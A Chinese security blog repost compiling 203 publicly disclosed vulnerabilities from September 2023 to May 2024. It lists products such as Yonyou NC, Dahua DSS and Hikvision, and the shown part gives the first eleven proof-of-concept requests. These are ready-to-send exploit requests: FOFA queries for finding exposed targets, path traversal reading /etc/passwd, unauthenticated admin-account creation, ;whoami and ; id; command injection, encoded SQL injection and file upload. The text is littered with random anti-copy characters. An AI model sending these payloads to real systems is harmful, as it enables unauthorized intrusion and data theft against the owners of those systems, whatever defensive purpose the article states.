互联网公开漏洞整理202309-202406
( n. B& S$ x8 Z: h1 B& O' Q% }* @( n道一安全 2024-06-05 07:41 北京
3 q1 s! |6 J, p2 e6 y: v) C以下文章来源于网络安全新视界 ,作者网络安全新视界; i& T) e6 W8 H9 V$ t5 U
' p" x9 P& N0 i2 w) ^9 U0 U4 J+ P发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
' D6 r. O5 }; z
* D; g: }3 Z/ p+ }& p( g" Z5 W1 ^漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
% ~* S3 U& f- r# t; H2 ?
1 }* S. y+ _. O N. U安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
6 r/ a: A+ N$ h+ |6 c& k& R6 w3 `: i f' R( O$ a8 i
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
- w5 g% o' g2 N7 b* n
5 Y) O, l: d) l1 m# Y% p' W; Z! b合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。1 q4 A% a( i) `" M, G1 l
: k( Q2 S1 \9 j
, \9 u! @! `/ g5 Z. w
声明; n* W& h9 v0 ?, N: d8 K. L
* a) P% _$ e8 f$ W2 s2 M4 S* f为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
9 |/ p+ C; l6 g3 t6 I( l
) A# m ?, A' w4 q' H9 u5 b: W有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。- E3 a3 k' \3 @, j# {
. Z2 y( D6 v+ A
e" Q. G. `7 |6 n1 v3 k0 y i$ F4 v% l' T7 n' E9 F
目录9 y8 L! l* k! Y! d6 Z c# g
0 J! q0 T$ U6 Z! @0 U7 D01
1 z- J4 ]" n2 G; O
) J2 s W5 M/ K4 O# ^1. StarRocks MPP数据库未授权访问
6 O P0 C3 M a1 N6 ~/ P- l X- B2. Casdoor系统static任意文件读取4 B1 ?+ u4 o5 z' v: _. R
3. EasyCVR智能边缘网关 userlist 信息泄漏" G& A1 K' b$ ~- t' y+ L
4. EasyCVR视频管理平台存在任意用户添加 m% L* k, e! Q! r. D& g' T
5. NUUO NVR 视频存储管理设备远程命令执行
- }. T, `: B* V* s3 a1 n$ r6. 深信服 NGAF 任意文件读取% h( A; b4 M5 g7 G
7. 鸿运主动安全监控云平台任意文件下载
" u8 E8 P2 o1 y# C# ]8. 斐讯 Phicomm 路由器RCE9 {' E& r4 _% s" R
9. 稻壳CMS keyword 未授权SQL注入
! t8 x6 w% W4 F* G3 s3 K9 g10. 蓝凌EIS智慧协同平台api.aspx任意文件上传$ c7 b5 {! c% N4 Z4 c8 R$ r
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# S4 E0 v7 |3 H12. Jorani < 1.0.2 远程命令执行( V* t1 x( Y% C8 h8 y, `. h. [$ T
13. 红帆iOffice ioFileDown任意文件读取
- Q4 X& M" {. _* ^- }, ^. m14. 华夏ERP(jshERP)敏感信息泄露- x6 Z8 A' y. X9 v K! X9 n1 B
15. 华夏ERP getAllList信息泄露7 k( r* n8 {( o$ H
16. 红帆HFOffice医微云SQL注入) u0 x& k1 n# E0 L/ g- H# O) V2 s4 [( \4 q
17. 大华 DSS itcBulletin SQL 注入6 X8 K9 v7 m2 p- [: M' j
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露: A) y0 Z, i ~: S
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
b$ X+ F1 s, z% f- Y( E20. 大华ICC智能物联综合管理平台任意文件读取
+ w8 x. I7 t, y6 E: o21. 大华ICC智能物联综合管理平台random远程代码执行1 P. W. j) G C/ g! |: Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ S. Z! ?: e- w- U- a23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
: d; c, w* H# @9 d3 ^& \24. 用友NC 6.5 accept.jsp任意文件上传$ V+ N- H4 P2 ^$ ~0 o7 x
25. 用友NC registerServlet JNDI 远程代码执行" | [* d* M& o6 x3 Z
26. 用友NC linkVoucher SQL注入
8 k1 A1 Z0 V! }$ H }: e' S27. 用友 NC showcontent SQL注入
& ~6 r- e, T# S( r28. 用友NC grouptemplet 任意文件上传! E4 w5 E4 r' S) R
29. 用友NC down/bill SQL注入/ w7 g7 p9 P, ?9 S6 a; }
30. 用友NC importPml SQL注入4 ?" P& F/ a" q* f0 M$ L0 N9 N# i
31. 用友NC runStateServlet SQL注入0 v, b- _& U' h: B9 C, S! t
32. 用友NC complainbilldetail SQL注入5 W4 G/ f9 [2 j) B# T$ M; V# ?
33. 用友NC downTax/download SQL注入+ S' t7 a* E# N( e3 q
34. 用友NC warningDetailInfo接口SQL注入8 h! T; r4 [! p- N% P
35. 用友NC-Cloud importhttpscer任意文件上传
, ?# A/ W+ I! b4 c36. 用友NC-Cloud soapFormat XXE* f3 D+ Y* N- x" ]6 T: ?5 l
37. 用友NC-Cloud IUpdateService XXE
5 V( n: p6 k! i9 d( Z38. 用友U8 Cloud smartweb2.RPC.d XXE+ N- V, w8 T, M, r3 y3 \3 c. a
39. 用友U8 Cloud RegisterServlet SQL注入6 ? W w& m- i6 b% r' n( X5 C7 [
40. 用友U8-Cloud XChangeServlet XXE
3 E A* P& C) u7 y4 P. H( _41. 用友U8 Cloud MeasureQueryByToolAction SQL注入- p: R. j/ g7 t1 l5 R' Z
42. 用友GRP-U8 SmartUpload01 文件上传
; r! ] p! I' J% f E& R43. 用友GRP-U8 userInfoWeb SQL注入致RCE! l/ i9 p- `; k) d: X
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
) q1 P4 H+ R2 z* }) v/ C5 M9 c45. 用友GRP-U8 ufgovbank XXE& w$ f B9 [7 m" J% `
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
2 S+ L/ F B. R3 b; Y k47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 _4 }8 [1 |$ v4 k7 j48. 用友U8 CRM swfupload 任意文件上传$ i. N7 z1 |( o
49. 用友U8 CRM系统uploadfile.php接口任意文件上传1 \+ {- s5 d1 A/ r( o( J' B
50. QDocs Smart School 6.4.1 filterRecords SQL注入: e- X' P& j8 L2 P. c! T
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, j' Q" q1 C- h" ]2 f/ U
52. 泛微E-Office json_common.php sql注入% F8 Q" W! ^5 b3 d# W8 [5 A2 k5 |
53. 迪普 DPTech VPN Service 任意文件上传
( M2 t1 [; a1 _1 X54. 畅捷通T+ getstorewarehousebystore 远程代码执行
! @* t" _& x8 P& L3 J55. 畅捷通T+ getdecallusers信息泄露
0 K2 C% ~4 m# @9 L, k0 v; [$ N. S56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# h4 s; v! j# y0 o: |) t# w% Q
57. 畅捷通T+ keyEdit.aspx SQL注入
9 ], S- ? E. \! B58. 畅捷通T+ KeyInfoList.aspx sql注入 ]2 ~6 H% `4 w. m
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
# b! J" v/ p7 n/ Q- X1 Y7 L60. 百卓Smart管理平台 importexport.php SQL注入6 x% V+ L9 T' t6 _6 p
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
6 p6 _* g7 G) @4 z% ^62. IP-guard WebServer 远程命令执行
: Y" w- b, ?3 h3 ~63. IP-guard WebServer任意文件读取2 l: K# @- ~8 j
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 v; s9 t$ ?5 C; m" T! I65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过6 g) o/ m0 `. {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
# A9 |# w* `) e4 w& m, {67. 万户ezOFFICE wpsservlet任意文件上传
8 c& @$ h4 I0 c7 Z3 V68. 万户ezOFFICE wf_printnum.jsp SQL注入- O5 C. U4 e0 W! j
69. 万户 ezOFFICE contract_gd.jsp SQL注入
, @2 }' c. B& c$ a70. 万户ezEIP success 命令执行& Z6 z, E8 A3 @: Y! S5 _9 z) L, W
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
$ k' `$ T+ b0 {0 q) G% F72. 致远OA getAjaxDataServlet XXE, ?$ R' t( D; ]* q `2 k
73. GeoServer wms远程代码执行. K2 v9 a* k4 N# g
74. 致远M3-server 6_1sp1 反序列化RCE
3 u! _+ h- L' g2 s4 a0 O& R75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 c- U* l( p* p6 s- q76. 新开普掌上校园服务管理平台service.action远程命令执行. x8 Z8 t- P; m3 x6 N9 o, r
77. F22服装管理软件系统UploadHandler.ashx任意文件上传; D# p* } J* r( k; |" L
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传: W* u9 L4 Z" A
79. BYTEVALUE 百为流控路由器远程命令执行0 D B1 f9 b% I( O6 e+ {. e8 N
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
" X/ E4 k2 @% U' b) }1 C& E81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% v/ q" f2 Y$ ]( s82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行6 R I( M- v" `( J
83. JeecgBoot testConnection 远程命令执行/ w5 N7 q0 e- d0 R. F. ] w
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入$ K2 ^/ X0 [7 J' S+ _
85. SysAid On-premise< 23.3.36远程代码执行* V) C; x) @$ n
86. 日本tosei自助洗衣机RCE
8 {" S# q, [0 j% t) t) m87. 安恒明御安全网关aaa_local_web_preview文件上传
# c0 ^: ]6 P5 }3 ?88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
# f1 W4 V/ S/ e9 [+ v6 X" v89. 致远互联FE协作办公平台editflow_manager存在sql注入# r( n! R! R4 j) K2 J1 n0 n3 c
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行( z" s3 z% z7 A+ _
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取4 _4 h- Z7 e. E$ e( k2 [
92. 海康威视运行管理中心session命令执行) l* r2 d; W! P6 g/ M7 _* j3 T
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
8 O0 y5 S* ^7 m F( A$ q94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
2 Z/ R, j0 O [+ O95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" X! m' p) Z4 N0 j" [5 y96. Apache OFBiz 18.12.11 groovy 远程代码执行6 T+ s# D- b) _: P0 m# F
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行5 [: C8 f* K" l, s% d8 g. R
98. SpiderFlow爬虫平台远程命令执行; c0 o1 ?* R. @1 k4 b
99. Ncast盈可视高清智能录播系统busiFacade RCE
! l: c, ]! t2 M. V5 G! ?, `100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传0 @ U$ _; E1 B. S3 d$ C
101. ivanti policy secure-22.6命令注入, J% t/ m O0 S/ T6 W, e
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行# B, \ e; z' f* V* D. e, m
103. Ivanti Pulse Connect Secure VPN XXE, ~& w1 C1 y# X
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露4 V" Q4 \3 u* T3 Y1 I
105. SpringBlade v3.2.0 export-user SQL 注入
: C+ Y# q; l$ L1 {4 Z( |106. SpringBlade dict-biz/list SQL 注入4 h6 p- G! V1 r
107. SpringBlade tenant/list SQL 注入
0 W! }$ L$ ]0 k* q0 {108. D-Tale 3.9.0 SSRF% n2 Y/ @+ ?- ? u
109. Jenkins CLI 任意文件读取
# j, g: V6 b; T110. Goanywhere MFT 未授权创建管理员
( `7 W+ o, G& n6 C' G9 X111. WordPress Plugin HTML5 Video Player SQL注入( H9 u" b" X/ e2 n$ ?2 K
112. WordPress Plugin NotificationX SQL 注入
1 D% ~6 j# ^& c7 \2 s0 b113. WordPress Automatic 插件任意文件下载和SSRF
" `4 I- G5 r& F; V5 S114. WordPress MasterStudy LMS插件 SQL注入" t+ V$ n6 w: m0 z; p
115. WordPress Bricks Builder <= 1.9.6 RCE; V# b* Q& k: ^, G+ Q# @7 ?
116. wordpress js-support-ticket文件上传
! Z4 L4 q" n3 M+ s1 ^9 |- y117. WordPress LayerSlider插件SQL注入
* I# M! X/ x2 a118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% P7 m& ]9 `, h" ^119. 北京百绰智能S20后台sysmanageajax.php sql注入# t2 w( T& a- H% @
120. 北京百绰智能S40管理平台导入web.php任意文件上传
0 v* X: B- F0 e; f; l121. 北京百绰智能S42管理平台userattestation.php任意文件上传
/ c. L: s1 F+ t" O1 r' T8 Z2 a122. 北京百绰智能s200管理平台/importexport.php sql注入
+ b+ t5 H, M4 S123. Atlassian Confluence 模板注入代码执行' X+ P. q" D( e1 m, \
124. 湖南建研工程质量检测系统任意文件上传, n6 z+ e* {9 T' z; {: F# r- m0 m, Z
125. ConnectWise ScreenConnect身份验证绕过
& s7 E4 E1 R' t126. Aiohttp 路径遍历
' s+ N8 ^, x- `127. 广联达Linkworks DataExchange.ashx XXE) |/ z- t4 e, l7 m
128. Adobe ColdFusion 反序列化
. m: G+ i2 m$ Y$ t( @0 Z129. Adobe ColdFusion 任意文件读取
' d7 O! P7 C& q130. Laykefu客服系统任意文件上传3 y2 W7 b5 V1 k; ~# z2 w9 E
131. Mini-Tmall <=20231017 SQL注入; @# a- C9 f6 j5 m& s0 o7 u
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
M- O) s& }6 a133. H5 云商城 file.php 文件上传
. [) O1 W/ X1 u* ?; N134. 网康NS-ASG应用安全网关index.php sql注入
# `7 ~( R! c8 \4 W9 o135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
5 s3 P8 [, f6 ]: ^: |; {7 {6 M6 U( H136. NextChat cors SSRF
; o" o$ m) ]8 f* y, I9 F, M137. 福建科立迅通信指挥调度平台down_file.php sql注入- E- W/ ^6 k/ I1 k/ K, e- E
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
3 S! a) ^2 E) R139. 福建科立讯通信指挥调度平台editemedia.php sql注入, L; |- `4 o" m# N6 _; I) H
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 R2 g. Z$ o3 k141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 d X, s3 k( p( i& s- \
142. CMSV6车辆监控平台系统中存在弱密码. M2 n* e, k3 h0 e* E- O% b
143. Netis WF2780 v2.1.40144 远程命令执行8 }2 o" c4 G5 i+ N' o6 [
144. D-Link nas_sharing.cgi 命令注入
. \7 h7 i# |$ i# O, J7 m145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 B3 m$ _) \. }) j* i146. MajorDoMo thumb.php 未授权远程代码执行
( I8 C6 L. W' [7 o% k) ^; F4 I& m3 P147. RaidenMAILD邮件服务器v.4.9.4-路径遍历4 @$ K+ Q6 H. m5 {0 b9 d
148. CrushFTP 认证绕过模板注入
$ @3 W1 S5 V% t. Z3 M149. AJ-Report开源数据大屏存在远程命令执行- q. |" E8 j/ p8 z5 |% _
150. AJ-Report 1.4.0 认证绕过与远程代码执行0 e& g6 `5 k P1 w/ q Y2 m
151. AJ-Report 1.4.1 pageList sql注入
' I' Y# \7 O7 f/ z152. Progress Kemp LoadMaster 远程命令执行
; N! M( C6 f" X+ P/ h0 p153. gradio任意文件读取# n5 {/ b- \. o. i' m" w
154. 天维尔消防救援作战调度平台 SQL注入8 j- @0 u; l1 ?7 b6 F
155. 六零导航页 file.php 任意文件上传
. B" Z; U6 o4 H! K [. I; T# j" u j156. TBK DVR-4104/DVR-4216 操作系统命令注入
- a9 n& p0 V' b" g: z9 }! {157. 美特CRM upload.jsp 任意文件上传! {7 t! C# R9 D& k9 U4 W" Z
158. Mura-CMS-processAsyncObject存在SQL注入5 d. r$ ~( @+ Q, T# Z$ o
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
( a: y6 ]9 V: k160. Sonatype Nexus Repository 3目录遍历与文件读取# \: k s v+ i9 ?4 Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. [! q! z0 W9 f$ a
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# ^& ^7 }! z* d% B; `2 h% O$ U163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
b0 h+ q8 d6 C/ }2 R# i; }164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ r7 Z1 U$ w5 {8 m. n
165. OrangeHRM 3.3.3 SQL 注入
. x" l/ j) N! h$ E. B3 Q Q166. 中成科信票务管理平台SeatMapHandler SQL注入. U- U/ a2 u3 t
167. 精益价值管理系统 DownLoad.aspx任意文件读取
8 n9 j. t' \2 M9 h' p/ }168. 宏景EHR OutputCode 任意文件读取% G$ g5 U1 |1 J, m
169. 宏景EHR downlawbase SQL注入
; S& ~& y8 l! E( e170. 宏景EHR DisplayExcelCustomReport 任意文件读取* F7 D& e9 _1 B v& g
171. 通天星CMSV6车载定位监控平台 SQL注入
- P8 v W# i0 X, @5 a4 k! a172. DT-高清车牌识别摄像机任意文件读取
$ ?3 W6 B4 y! z/ O173. Check Point 安全网关任意文件读取
8 \. R" l5 E' J2 M174. 金和OA C6 FileDownLoad.aspx 任意文件读取5 {6 r2 z7 Q1 R& {" _, a" \: U
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
1 L# g9 n+ W; a1 ?176. 电信网关配置管理系统 rewrite.php 文件上传8 m- e* q$ n! ^; s" B# l. j1 o4 M
177. H3C路由器敏感信息泄露
8 u6 b8 O" O' B178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- f" G, e2 i# v5 q6 X179. 建文工程管理系统存在任意文件读取) X; O8 g& u. l7 Q( I- r, L
180. 帮管客 CRM jiliyu SQL注入$ @7 @: x! c9 }( g6 c8 r
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; z! v6 ~2 [, @/ n5 k3 c' o
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建$ X2 P' p. A! \- {- Y
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入9 x1 }" v$ S% V+ L) N7 K
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 C# x |2 C: I185. 瑞友天翼应用虚拟化系统SQL注入
+ k1 I) K) g p% M; E7 m8 Z186. F-logic DataCube3 SQL注入6 H. ]6 i, T6 Q6 {- A
187. Mura CMS processAsyncObject SQL注入& c5 a( b @! }: Z$ u9 b& ]
188. 叁体-佳会视频会议 attachment 任意文件读取
6 A: x1 L7 j, G4 A* I189. 蓝网科技临床浏览系统 deleteStudy SQL注入! }3 f* T7 N! \. R! b- @+ ?; l: T
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 I3 J' h- ?- U0 y191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
- Z8 j) d1 O% M1 q; ~192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
2 h; t5 ?3 K; y* U. l193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行: r9 {0 k3 X5 p9 L8 Q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
/ X3 @0 B1 ?) A' U! N; P* m195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, |+ k/ o+ \+ B3 u+ C9 f196. 河南省风速科技统一认证平台密码重置
6 l0 n2 b0 [& }$ r! L197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" Y0 e( A) W/ Q198. 阿里云盘 WebDAV 命令注入
M/ e- v7 q+ s/ V199. cockpit系统assetsmanager_upload接口 文件上传
; o* u4 d7 J2 r( f$ a9 c200. SeaCMS海洋影视管理系统dmku SQL注入9 d/ q& r8 u5 Q
201. 方正全媒体新闻采编系统 binary SQL注入
4 Y# K/ d* L- @202. 微擎系统 AccountEdit任意文件上传; Y2 _" p- E9 o) X. j
203. 红海云EHR PtFjk 文件上传$ o+ a2 V3 }2 A0 c
2 h5 U! W5 q; @4 _; ^
POC列表7 T0 V2 E6 e3 v1 K7 x1 Z
/ n1 h- ^; p8 M: u$ {02
[" i2 R# \' ^: L) {4 c. b; W' i. `7 ?8 K" b* ^' s4 N
1. StarRocks MPP数据库未授权访问
. q+ ?; M& N5 l/ O; O, PFOFA :title="StarRocks"
0 y2 U K0 c9 \( ~7 UGET /mem_tracker HTTP/1.1
: I% K# t- S/ v" ]Host: URL# Y4 o; j2 T: f0 o
$ r4 Z* N/ K9 |( |
/ B8 x" i4 i% z) M+ G I- t2. Casdoor系统static任意文件读取- {4 }4 d/ r0 v% ]* u
FOFA :title="Casdoor"
/ E- t6 w7 J* `& ]GET /static/../../../../../../../../../../../etc/passwd HTTP/1.12 E* J" n# ~4 r2 X2 J e% x
Host: xx.xx.xx.xx:9999
T+ x; D: e: N0 }6 Y; xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! r+ r- m5 R9 D' ^2 \3 [: n) a
Connection: close. f ?) O* V: `6 e
Accept: */*6 F: |6 {' g- B: y0 o* Z7 p
Accept-Language: en
& o2 P& Y0 K' d1 ?$ aAccept-Encoding: gzip
1 s. I# i$ ?4 t* f* m! f) ^, I/ u, o# S# M
& k F y8 K) {* j, }
3. EasyCVR智能边缘网关 userlist 信息泄漏: G C$ X4 X0 v: x) o; t% Z% b. L
FOFA :title="EasyCVR"- P; t! [% A3 Q
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
3 u( U5 G" d8 ^0 w3 ZHost: xx.xx.xx.xx
( N% Z7 Y2 d; y n& E
u. i6 r, K- J" u
5 _$ H# y+ A6 Z1 N, ?# u, j4. EasyCVR视频管理平台存在任意用户添加3 v0 O1 Y% b. q5 p- v P! B
FOFA :title="EasyCVR"
) p! s% n! @( l8 ?' A2 d& P- N- v1 b& g7 G. [$ Z3 b0 h; |
password更改为自己的密码md5
* ~6 z* l9 f' w* CPOST /api/v1/adduser HTTP/1.1
9 a4 P9 A. U ~; nHost: your-ip J5 n. f) k: Z( x. S5 c! D; p
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! a% p' k' _" }, S W4 d
* u4 w5 W+ v3 _" s& S9 E- f0 N% ~; Tname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=13 v2 _- u3 W" ^
( y9 S( Z# a0 \5 B( U, k; D
# t4 R1 n9 s. E! n. C6 N# k5. NUUO NVR 视频存储管理设备远程命令执行; Z' P8 M3 }. A) j
FOFA:title="Network Video Recorder Login"
. d/ K* C5 T3 g4 q J9 MGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
5 j1 y Z% ~4 l F0 U; dHost: xx.xx.xx.xx v* E* t3 ~; g2 Q0 s
! @7 T& @3 F0 [# N6 A& }/ n% t! S
1 F5 w/ s9 i0 a. F
6. 深信服 NGAF 任意文件读取
" Y2 e0 r+ c: c( W) J3 _FOFA:title="SANGFOR | NGAF"0 V' H* y! {4 C, d. E* j ]5 D
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+ ]+ j7 @" Y: @, @. r, v0 |Host:. @% s) }: W3 ^' G. R5 ~4 U3 U
9 V4 A5 {6 d8 E* G9 a1 F$ } | W
8 l2 D, Q+ t" k. H& U2 Y! \- B( h7. 鸿运主动安全监控云平台任意文件下载: {# c8 P! o4 K6 y- d
FOFA:body="./open/webApi.html"% ~) {9 |4 J8 W* n" v. ^
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
4 u* u# O: u4 @) A5 y, MHost:) z% z6 `+ d C/ T! Q) K* e6 L
7 [/ k' r6 v6 H/ A/ b7 p: ~( y
) ]& P& Z8 a L5 g) G Z# k7 F8. 斐讯 Phicomm 路由器RCE: d/ I+ n1 E- O! E( H' _
FOFA:icon_hash="-1344736688"5 g# d2 L& k* h3 `! x
默认账号admin登录后台后,执行操作! i9 Z! P; d$ t, C c9 f
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
8 \% L& K8 g" DHost: x.x.x.x- u0 e$ _ h" \ Y
Cookie: sysauth=第一步登录获取的cookie
6 E; G& b8 {4 C ^9 A8 G, |( rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
% p, l# n3 F* ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 O2 Y5 w( g4 j4 t. a
7 e/ e# x7 o+ e k) `
------WebKitFormBoundaryxbgjoytz
& n0 y" v' \. z. z. Q( N' \3 @+ \& ZContent-Disposition: form-data; name="wifiRebootEnablestatus"3 v5 ~1 r' ~ w3 e0 v
- z, d; y' K6 V, k/ [
%s2 o; t+ ` F$ i
------WebKitFormBoundaryxbgjoytz
/ s6 a( p! D2 C( h/ HContent-Disposition: form-data; name="wifiRebootrange"3 j; f! l) G- B% x
0 @4 c S# }. M/ `) ^12:00; id;, ^3 t3 x# ?. N, w0 @
------WebKitFormBoundaryxbgjoytz Q* q5 c, c- K9 B
Content-Disposition: form-data; name="wifiRebootendrange"
6 p' r) z+ }# a" V1 h) V; ]
; [/ I% U, E) z+ I%s:7 H; e2 `9 I {5 n( }
------WebKitFormBoundaryxbgjoytz! x: c3 h' I. a2 A2 C7 k
Content-Disposition: form-data; name="cururl2"
L# S8 K, z$ y8 o. {
: D3 `/ K/ S. l
. |+ C9 L x' a: m Q5 v------WebKitFormBoundaryxbgjoytz--6 q( d7 V" h" a5 I6 {7 v
# E* o& U! v) O9 t2 A) U7 g
, t7 V" U! b* |% \) D
9. 稻壳CMS keyword 未授权SQL注入
?+ m" q: J0 P2 y8 mFOFA:app="Doccms"
" ~; ?1 B$ p8 X2 ?GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
* s1 n. J: g0 \Host: x.x.x.x
" k/ `+ r7 I/ [
2 q& L) B0 L9 d1 L; e
, }8 i+ L& b# k; F" Spayload为下列语句的二次Url编码
1 Q8 n% E4 j. i6 G9 V7 S, V3 D6 r! k' ~4 }
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' D2 Z2 g0 F3 @( L; F7 Q4 V
! @9 M1 L5 t1 a3 i
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
1 I A" N- p) U+ L! QFOFA:icon_hash="953405444"
$ l5 v% p- s2 Y1 l
7 \) n' e1 q% `9 v0 r+ H文件上传后响应中包含上传文件的路径
) T' }8 a, F+ {1 y0 `* KPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
% H5 ~# L7 W( e& oHost: x.x.x.x:xx! C$ ]4 m' t3 |- D G: M! E I z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
9 S8 L' g" D0 H( yContent-Length: 197
s& E o- X! `( E Z0 z7 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
; ]* i- F* y: ^. N$ f% Z- wAccept-Encoding: gzip, deflate# Y/ u' ]4 t. ]! ?& m
Accept-Language: zh-CN,zh;q=0.9
+ E4 h" Q; U/ ]" K1 V JConnection: close
7 O5 m/ u3 C9 v1 yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
. D8 j) f! B& E1 i
; {2 r3 y1 N! ~* T5 A% \8 i7 n7 ^------WebKitFormBoundaryxdgaqmqu$ i; }6 f$ r7 {! ] M
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
& x1 Y/ \7 w. G. x$ A# W& N, YContent-Type: text/html' N: }5 f. A6 p2 P, k% u
1 b, _1 s- M( }& _jmnqjfdsupxgfidopeixbgsxbf/ c3 J) P; `0 j. y9 U0 `! [8 M
------WebKitFormBoundaryxdgaqmqu--
. T$ z R) ?, e- v* [6 }- Q
0 Y9 Z3 `3 q- B3 v/ @! n
( s0 y& T) _. a" K: u11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
2 H" }# C7 \; ?8 G mFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
* D: j4 t7 G. b: S( sGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1. U2 b7 k8 r( w1 S1 s
Host: 127.0.0.1: y/ b/ I2 c" p, [0 F
Pragma: no-cache l t) x0 h3 W7 ~2 w, y6 F$ e+ c1 ]
Cache-Control: no-cache
0 y9 r- z1 }- w% q2 c# f6 KUpgrade-Insecure-Requests: 1
